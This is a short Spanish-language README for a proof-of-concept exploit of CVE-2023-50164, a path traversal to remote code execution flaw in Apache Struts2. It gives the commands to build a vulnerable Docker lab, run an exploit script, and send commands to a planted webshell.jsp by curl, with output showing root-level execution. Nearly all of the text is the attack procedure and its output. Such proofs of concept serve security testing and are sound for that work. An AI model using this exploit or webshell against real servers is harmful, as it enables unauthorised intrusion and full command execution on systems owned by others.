
CVE-2023-50164 (vulnerabilidad de path traversal a RCE en Apache Struts) - Prueba de concepto
Esta PoC ha sido creada para probar un RCE (Ejecución Remota de Código) explotando la vulnerabilidad de Apache Struts2.

Construye la imagen y ejecuta un contenedor:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
Ejecuta el exploit:
$ cd exploit
$ ./exploit.sh
Ahora puedes ejecutar comandos arbitrarios en el lado del servidor como se muestra:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)